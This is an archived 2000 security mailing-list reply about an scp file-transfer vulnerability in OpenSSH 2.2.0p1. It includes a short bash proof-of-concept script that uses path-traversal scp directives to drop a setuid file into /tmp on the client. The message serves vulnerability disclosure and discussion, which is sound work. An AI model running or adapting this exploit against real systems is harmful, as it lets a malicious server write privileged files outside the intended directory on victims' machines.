|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: openssh2.2.p1 - Re: scp file transfer hole
From: Robert Bihlmeyer (robbe
ORCUS.PRIV.AT)Date: Mon Oct 02 2000 - 12:06:01 CDT
- Next message: CDI: "Moreover Cached_Feed CGI Vulnerability"
- Previous message: Security Team: "DST2K0036: Price modification possible in CyberOffice Shopping Ca rt"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Martin MaD Douda <martinDOUDA.NET> writes:
> Using your scripts I could make suid scpuser's file in /tmp, but probably
> due to some protocol change in scp, the file was empty and scp has died
> with "lost connection".
It worked much better for me once I removed all "of=/dev/stdout" from
the script. All dd versions that I know have stdout as default output
target, anyway. The new version created a 200 byte file alright:
-- #!/bin/bashecho "D0755 0 ../../../../../../tmp/nope" echo "D0755 0 ../../../../../../tmp" echo "C4755 200 ScpIsBuggy" dd if=/dev/urandom bs=200 count=1 2>/dev/null dd if=/dev/zero bs=1 count=2 2>/dev/null --
> Since openssh 2.2.0p1 is latest existing version, this vulnerability > probably exist in every single scp version in the world.
Data Fellows/SSH Communication Security's ssh 2 uses a different file transfer protocol. So the above exploit won't work. That doesn't mean that there are more sanity checks, though.
-- Robbe
- application/pgp-signature attachment: signature.ng
- Next message: CDI: "Moreover Cached_Feed CGI Vulnerability"
- Previous message: Security Team: "DST2K0036: Price modification possible in CyberOffice Shopping Ca rt"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]